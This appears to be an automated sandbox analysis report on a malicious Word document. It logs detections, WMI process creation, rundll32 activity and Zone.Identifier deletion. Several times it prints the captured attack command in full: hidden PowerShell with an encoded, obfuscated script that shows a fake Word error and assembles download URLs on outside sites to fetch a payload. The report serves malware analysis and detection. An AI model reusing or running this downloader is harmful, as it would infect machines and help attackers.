Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008085 push ecx; ret		7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004ADA push ecx; ret		7_2_10004AED

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mwmjhjl\dvgjre.ish:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Bfafpdt\kkujpl.inf:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Stxynijtatjphar\aakvwlgscnjram.hbh:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Oumozqnkirxudf\mcchvdsvabpvx.nrv:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ailact\ivkbd.qrm:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Akjjgl\zoljk.jdx:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Liisdspzre\vtsbueurz.syo:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Uwcxnjiedvybvto\cwmcmgelygpijt.aui:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
